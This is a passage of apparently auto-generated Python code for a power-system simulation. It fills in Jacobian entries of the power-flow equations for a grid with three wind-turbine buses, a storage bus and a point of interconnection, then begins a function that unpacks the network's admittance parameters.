struct[0].Gy_ini[4,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,12] = V_W3lv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[4,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,4] = 2*V_W3lv*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,12] = V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[5,13] = V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[6,6] = 2*V_STlv*g_STmv_STlv + V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,7] = V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,16] = V_STlv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[6,17] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,6] = 2*V_STlv*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,16] = V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[7,17] = V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[8,0] = V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[8,1] = V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[8,8] = V_W1lv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,9] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,10] = V_W1mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[8,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,0] = V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[9,1] = V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].Gy_ini[9,8] = V_W1lv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + 2*V_W1mv*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,9] = V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[9,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,2] = V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[10,3] = V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[10,8] = V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,9] = V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[10,10] = V_W1mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,11] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(-b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,12] = V_W2mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[10,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,2] = V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[11,3] = V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].Gy_ini[11,8] = V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[11,9] = V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].Gy_ini[11,10] = V_W1mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + 2*V_W2mv*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,11] = V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,12] = V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[11,13] = V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,4] = V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,5] = V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,10] = V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,11] = V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[12,12] = V_POImv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].Gy_ini[12,13] = V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(-b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[12,14] = V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[12,15] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[13,4] = V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,5] = V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,10] = V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[13,11] = V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].Gy_ini[13,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + 2*V_W3mv*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].Gy_ini[13,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].Gy_ini[13,14] = V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[13,15] = V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,12] = V_POImv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,13] = V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,14] = V_POI*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + 2*V_POImv*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,15] = V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[14,16] = V_POImv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[14,17] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[14,18] = V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[14,19] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[15,12] = V_POImv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,13] = V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) + g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + 2*V_POImv*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].Gy_ini[15,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[15,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[15,18] = V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[15,19] = V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[16,6] = V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[16,7] = V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[16,14] = V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[16,15] = V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[16,16] = V_POImv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + 2*V_STmv*(g_STmv_POImv + g_STmv_STlv)
struct[0].Gy_ini[16,17] = V_POImv*V_STmv*(-b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(-b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,6] = V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,7] = V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) + g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[17,14] = V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv))
struct[0].Gy_ini[17,15] = V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) + g_STmv_POImv*cos(theta_POImv - theta_STmv))
struct[0].Gy_ini[17,16] = V_POImv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + 2*V_STmv*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].Gy_ini[17,17] = V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].Gy_ini[18,14] = V_POI*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[18,15] = V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[18,18] = V_GRID*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + 2*V_POI*(g_POI_GRID + g_POI_POImv) + V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[18,19] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[18,20] = V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[18,21] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[19,14] = V_POI*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[19,15] = V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) + g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[19,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + 2*V_POI*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].Gy_ini[19,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].Gy_ini[19,20] = V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[19,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,18] = V_GRID*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,19] = V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[20,20] = 2*V_GRID*g_POI_GRID + V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[20,21] = V_GRID*V_POI*(-b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[20,25] = -S_n_GRID/S_base
struct[0].Gy_ini[21,18] = V_GRID*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[21,19] = V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) + g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[21,20] = 2*V_GRID*(-b_POI_GRID - bs_POI_GRID/2) + V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI))
struct[0].Gy_ini[21,21] = V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI))
struct[0].Gy_ini[21,26] = -S_n_GRID/S_base
struct[0].Gy_ini[22,20] = K_p_GRID*(-i_d_GRID*sin(delta_GRID - theta_GRID) - i_q_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,21] = K_p_GRID*(V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) - V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,22] = -1
struct[0].Gy_ini[22,23] = K_p_GRID*(-2*R_v_GRID*i_d_GRID - V_GRID*sin(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,24] = K_p_GRID*(-2*R_v_GRID*i_q_GRID - V_GRID*cos(delta_GRID - theta_GRID))
struct[0].Gy_ini[22,27] = K_p_GRID
struct[0].Gy_ini[23,20] = -sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[23,21] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[23,23] = -R_v_GRID
struct[0].Gy_ini[23,24] = X_v_GRID
struct[0].Gy_ini[24,20] = -cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[24,21] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[24,23] = -X_v_GRID
struct[0].Gy_ini[24,24] = -R_v_GRID
struct[0].Gy_ini[25,20] = i_d_GRID*sin(delta_GRID - theta_GRID) + i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,21] = -V_GRID*i_d_GRID*cos(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,23] = V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,24] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[25,25] = -1
struct[0].Gy_ini[26,20] = i_d_GRID*cos(delta_GRID - theta_GRID) - i_q_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,21] = V_GRID*i_d_GRID*sin(delta_GRID - theta_GRID) + V_GRID*i_q_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,23] = V_GRID*cos(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,24] = -V_GRID*sin(delta_GRID - theta_GRID)
struct[0].Gy_ini[26,26] = -1
struct[0].Gy_ini[27,22] = -1/Droop_GRID
struct[0].Gy_ini[27,27] = -1
struct[0].Gy_ini[27,29] = K_sec_GRID
struct[0].Gy_ini[28,22] = 1
struct[0].Gy_ini[28,28] = -1
struct[0].Gy_ini[29,28] = -K_p_agc
struct[0].Gy_ini[29,29] = -1
def run_nn(t,struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
